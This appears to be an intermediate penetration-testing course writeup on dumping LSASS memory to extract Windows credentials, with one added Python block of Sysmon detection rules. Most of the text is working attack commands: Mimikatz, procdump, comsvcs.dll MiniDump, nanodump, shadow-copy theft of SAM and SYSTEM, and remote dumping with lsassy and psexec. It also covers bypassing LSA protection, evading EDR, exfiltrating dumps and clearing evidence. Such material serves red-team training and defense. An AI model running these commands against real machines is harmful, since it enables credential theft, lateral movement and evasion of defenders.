LSASS Dumping Techniques

intermediate · 30 min · Writeup

Various methods to extract credentials from LSASS

Learning Objectives

  • Understand LSASS protection
  • Use various dumping tools
  • Evade credential dump detection
  • Process dump files offline

LSASS (Local Security Authority Subsystem Service) is where Windows keeps your secrets. Passwords, hashes, tickets - it's all in LSASS memory. Dumping LSASS is how Mimikatz extracts credentials. But Mimikatz is heavily detected - let's explore all the ways to get at that juicy memory.

Think of LSASS as the security guard who knows everyone's secret password. The guard needs to remember them to let people in, but if you can "read the guard's mind" (dump memory), you learn all the secrets.

Detection Focus

LSASS access is heavily monitored. EDR, AV, and Windows Defender all watch for it. Modern attacks focus on living-off-the-land binaries (LOLBins) and memory forensics evasion.

What's in LSASS?

LSASS Memory Contains:
├── NTLM hashes
│   └── For any user who logged in interactively
├── Kerberos tickets (TGT and TGS)
│   └── For any user with active sessions
├── Kerberos encryption keys
│   └── Used for ticket operations
├── Plaintext passwords (sometimes!)
│   └── If WDigest enabled or old systems
├── Cached credentials
│   └── Domain cached credentials (DCC2)
└── Various SSP credentials
    └── TSPKG, LiveSSP, etc.

Not in LSASS:
├── SAM database (use lsadump::sam)
├── NTDS.dit (on DC, use DCSync)
└── Credentials for users who haven't logged in

Direct LSASS Access

Mimikatz (Classic)

# Direct LSASS access
privilege::debug
sekurlsa::logonpasswords

# Heavily detected - rarely works on protected systems

pypykatz (Python)

bash
# Live LSASS (requires admin on Windows)
pypykatz live lsa

# Better: Parse dump file (offline analysis)
pypykatz lsa minidump lsass.dmp

LSASS Dump Methods

Task Manager (GUI)

# Simplest method - might work when tools don't!

1. Open Task Manager as Administrator
2. Go to the "Details" tab
3. Find lsass.exe
4. Right-click → "Create dump file"
5. Dump saved to %TEMP%\lsass.DMP

# Surprisingly effective on some EDR-protected systems
# GUI actions are less monitored than CLI tools

ProcDump (Sysinternals)

powershell
# Microsoft-signed tool = more trusted
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Evasion: Use PID instead of name
# ($pid is a read-only automatic variable in PowerShell, so use another name)
$lsassPid = (Get-Process lsass).Id
procdump.exe -accepteula -ma $lsassPid lsass.dmp

# Reflection mode (-r): dump a clone of the process rather than the live one
procdump.exe -accepteula -ma -r lsass.exe lsass.dmp

# Some EDR still catches this based on behavior

comsvcs.dll (LOLBin)

powershell
# Living-off-the-land - no external tools!
# Uses built-in Windows DLL

# Find LSASS PID ($pid is read-only in PowerShell, so use another name)
$lsassPid = (Get-Process lsass).Id

# Method 1: rundll32
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\temp\lsass.dmp full

# Method 2: From cmd
for /f "tokens=2" %a in ('tasklist ^| findstr lsass') do rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump %a lsass.dmp full

# Note: Requires SeDebugPrivilege (admin)

MiniDumpWriteDump API

powershell
# PowerShell using Windows API
$processId = (Get-Process lsass).Id
$dumpPath = "C:\temp\lsass.dmp"

# Load dbghelp.dll
$signature = @"
[DllImport("dbghelp.dll", SetLastError = true)]
public static extern bool MiniDumpWriteDump(
    IntPtr hProcess,
    uint ProcessId,
    IntPtr hFile,
    uint DumpType,
    IntPtr ExceptionParam,
    IntPtr UserStreamParam,
    IntPtr CallbackParam
);
"@
Add-Type -MemberDefinition $signature -Name "DbgHelp" -Namespace "Win32"

# Open process and create dump
# (Full implementation requires more code)

nanodump

# Stealthier LSASS dumping tool
# Uses syscalls to avoid API hooking

nanodump.exe --write C:\temp\lsass.dmp

# Options:
# --fork: Fork LSASS before dumping (avoids some detection)
# --shtinkering: Use syscalls
# --duplicate: Duplicate LSASS handle instead of opening

# Outputs custom format - parse with nanodump's parser or pypykatz

SafetyKatz

# Dumps LSASS and runs Mimikatz in memory
# Automated dump + parse

SafetyKatz.exe

# Or from Cobalt Strike
execute-assembly SafetyKatz.exe

Dump First, Parse Later

On heavily monitored systems, dump LSASS to a file, exfiltrate it, and parse offline. Running Mimikatz live is more detectable than just creating a dump file.

Parsing Dump Files

bash
# Mimikatz (Windows)
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

# pypykatz (Python - works on Linux!)
pypykatz lsa minidump lsass.dmp

# Output to file
pypykatz lsa minidump lsass.dmp -o creds.txt

# mimipenguin for specific parsing
python3 mimipenguin.py lsass.dmp

Shadow Copy Method

powershell
# Create shadow copy and copy SAM/SYSTEM/SECURITY
# Avoids file locks and some detection

# Create shadow copy
vssadmin create shadow /for=C:

# Copy files from shadow
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\temp\SECURITY

# Delete shadow copy (cleanup)
vssadmin delete shadows /shadow={SHADOW_ID} /quiet

# Parse offline
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

Remote LSASS Dumping

bash
# CrackMapExec - dump remotely
crackmapexec smb target -u admin -p password -M lsassy

# lsassy (specialized tool)
lsassy -u admin -p password -d corp.local target

# Impacket secretsdump (gets some creds but not full LSASS)
secretsdump.py corp.local/admin:password@target

# Remote procdump execution
psexec.py corp.local/admin:password@target 'procdump -accepteula -ma lsass.exe C:\temp\lsass.dmp'
# Then download the dump

LSASS Protections

LSA Protection (RunAsPPL):
├── LSASS runs as Protected Process Light
├── Only signed code can interact
├── Check: reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
├── Bypass: Vulnerable drivers, mimidrv.sys, PPLdump
└── Enable: Set RunAsPPL DWORD to 1

Credential Guard:
├── Virtualizes LSASS in secure container
├── Even SYSTEM can't access virtualized creds
├── Check: Get-ComputerInfo | select DeviceGuardSecurityServicesRunning
├── Bypass: Very difficult - usually need kernel exploit
└── Enable: Via Group Policy or WDAG config

Windows Defender Credential Guard:
├── Full virtualization-based protection
├── Requires Secure Boot, TPM 2.0, UEFI
└── Extremely effective when properly configured

Bypassing LSA Protection

# mimidrv.sys (Mimikatz driver)
!+                                          # Load driver
!processprotect /process:lsass.exe /remove  # Remove protection
sekurlsa::logonpasswords                    # Now works
!-                                          # Unload driver

# PPLdump
PPLdump.exe lsass.exe lsass.dmp

# These require admin and often trigger alerts
# EDR typically blocks driver loading

Detection & Evasion

Detection Methods:
├── Sysmon Event ID 10 - Process Access to LSASS
│   └── TargetImage contains lsass.exe
├── Sysmon Event ID 1 - Process creation
│   └── Known dump tools (procdump, etc.)
├── Sysmon Event ID 7 - Image loaded
│   └── comsvcs.dll, dbghelp.dll loading
├── Windows Security Event 4656/4663
│   └── Object access to LSASS process
├── EDR behavioral detection
│   └── OpenProcess on LSASS with VM_READ
└── AMSI for PowerShell-based methods

Evasion Techniques:
├── Use Microsoft-signed tools (procdump)
├── Fork LSASS process before dumping
├── Use direct syscalls (avoid API hooks)
├── Dump via GUI (Task Manager)
├── Dump on DC and exfil (different detection)
├── Use memory-only techniques
└── Time-of-day (dump during high activity)
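The detection methods listed above can be turned into a small rule set. The following is an added example written for this writeup; it is not code from the original page or from any of the tools discussed. It models Sysmon Event ID 10 (handle access to lsass.exe with dump-capable rights), Event ID 1 (command lines of the dumpers and LOLBin invocations covered here) and Event ID 7 (comsvcs.dll/dbghelp.dll loaded into rundll32 or a PowerShell host), and runs them over constructed sample events whose field names mirror Sysmon's EventData. The benign source-image allowlist and the severity logic are assumptions to be tuned against a real baseline.

```python
"""LSASS credential-access detection over Sysmon-style events (added example)."""
import re
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, Optional

# Process access rights from winnt.h that matter for memory dumping.
PROCESS_VM_READ = 0x0010
PROCESS_DUP_HANDLE = 0x0040
PROCESS_ALL_ACCESS = 0x1FFFFF  # value on Vista and later

# Assumed baseline (example only): images that open lsass.exe on a healthy
# host. Build this from your own telemetry; lowercase full paths.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Command-line fragments for the dump tools and LOLBin invocations on this page.
DUMP_TOOL_PATTERNS = [
    re.compile(r"procdump(64)?(\.exe)?\b.*\s-ma\b", re.I),
    re.compile(r"comsvcs(\.dll)?\s*,?\s*minidump\b", re.I),
    re.compile(r"\b(nanodump|safetykatz|lsassy)\b", re.I),
    re.compile(r"sekurlsa::", re.I),
]


@dataclass
class Alert:
    event_id: int
    rule: str
    detail: str


def parse_access(mask: str) -> int:
    """Sysmon writes GrantedAccess as a hex string such as '0x1010'."""
    return int(mask, 16)


def is_lsass(image: str) -> bool:
    return image.lower().endswith("\\lsass.exe")


def check_process_access(ev: Dict[str, Any]) -> Optional[Alert]:
    """Event ID 10: a handle to lsass.exe with rights usable for a dump."""
    if not is_lsass(ev.get("TargetImage", "")):
        return None
    src = ev.get("SourceImage", "").lower()
    mask = parse_access(ev.get("GrantedAccess", "0x0"))
    # VM_READ is what a minidump needs, DUP_HANDLE covers handle-duplication
    # variants, and full access is what most tools simply ask for.
    dump_capable = bool(mask & (PROCESS_VM_READ | PROCESS_DUP_HANDLE)) or mask == PROCESS_ALL_ACCESS
    if not dump_capable or src in BENIGN_SOURCES:
        return None
    # Sysmon prints unbacked call-stack frames as UNKNOWN(...); treat those as
    # stronger evidence of in-memory tooling than a stack of signed modules.
    severity = "high" if "UNKNOWN(" in ev.get("CallTrace", "") else "medium"
    return Alert(10, "lsass-handle-access", f"{severity}: {src} opened lsass.exe with 0x{mask:x}")


def check_process_create(ev: Dict[str, Any]) -> Optional[Alert]:
    """Event ID 1: command line matching a known dumper or LOLBin invocation."""
    cmd = ev.get("CommandLine", "")
    for pat in DUMP_TOOL_PATTERNS:
        if pat.search(cmd):
            return Alert(1, "dump-tool-cmdline", f"/{pat.pattern}/ matched: {cmd}")
    return None


def check_image_load(ev: Dict[str, Any]) -> Optional[Alert]:
    """Event ID 7: dump helper DLLs loaded into rundll32 or a PowerShell host.

    comsvcs.dll is normal inside COM+ hosts and dbghelp.dll is loaded by many
    programs, so this only fires for the hosts used by the comsvcs and
    MiniDumpWriteDump methods and should be correlated with an Event ID 10.
    """
    loaded = ev.get("ImageLoaded", "").lower()
    host = ev.get("Image", "").lower()
    if not loaded.endswith(("\\comsvcs.dll", "\\dbghelp.dll")):
        return None
    if host.endswith(("\\rundll32.exe", "\\powershell.exe", "\\pwsh.exe")):
        return Alert(7, "dump-dll-in-script-host", f"{host} loaded {loaded}")
    return None


RULES: Dict[int, Callable[[Dict[str, Any]], Optional[Alert]]] = {
    10: check_process_access, 1: check_process_create, 7: check_image_load,
}


def scan(events: List[Dict[str, Any]]) -> List[Alert]:
    """Apply the rule for each event's EventID; return alerts in input order."""
    alerts: List[Alert] = []
    for ev in events:
        rule = RULES.get(ev.get("EventID"))
        hit = rule(ev) if rule else None
        if hit:
            alerts.append(hit)
    return alerts


# Constructed sample telemetry (not real events); keys mirror Sysmon EventData.
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d0a4"},          # allowlisted
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1fffff", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d0a4"},        # GUI dump, medium
    {"EventID": 10, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\u.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d0a4|UNKNOWN(000001A2B3C4D5E6)"},  # high
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1000", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d0a4"},          # query-limited only
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\temp\lsass.dmp full"},
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"EventID": 1, "Image": r"C:\tools\procdump.exe", "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 7, "Image": r"C:\Windows\System32\rundll32.exe", "ImageLoaded": r"C:\Windows\System32\comsvcs.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe", "ImageLoaded": r"C:\Windows\System32\comsvcs.dll"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[EID {a.event_id}] {a.rule}: {a.detail}")
```

Running the script prints five alerts for the constructed sample: the Task Manager and the temp-folder executable handle opens (Event ID 10), the comsvcs.dll and procdump command lines (Event ID 1), and comsvcs.dll loaded into rundll32 (Event ID 7). Note that the Task Manager dump produces no suspicious command line at all; the Event ID 10 handle-access rule is what covers the GUI method.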

LSASS Dumping Methodology

LSASS Attack Flow

1. Check Protections: LSA Protection? Credential Guard?
2. Choose Method: Task Manager → ProcDump → comsvcs.dll → nanodump
3. Create Dump: Execute chosen dumping method
4. Exfiltrate: Copy dump file to analysis machine
5. Parse: Use Mimikatz or pypykatz to extract creds
6. Cleanup: Remove dump file, clear evidence

Knowledge Check

Quick Quiz
Question 1 of 3

What's the advantage of dumping LSASS to a file instead of running Mimikatz directly?

Challenges

Dump Without Tools

Challenge
🔥 intermediate

On a Windows machine with admin access but no external tools, dump LSASS memory using only built-in Windows functionality.


Key Takeaways

  • LSASS contains passwords, hashes, and Kerberos tickets
  • Task Manager dump is surprisingly effective
  • comsvcs.dll MiniDump is a LOLBin alternative
  • Dump and parse offline to avoid detection
  • LSA Protection makes dumping harder but not impossible
  • Credential Guard virtualizes and truly protects credentials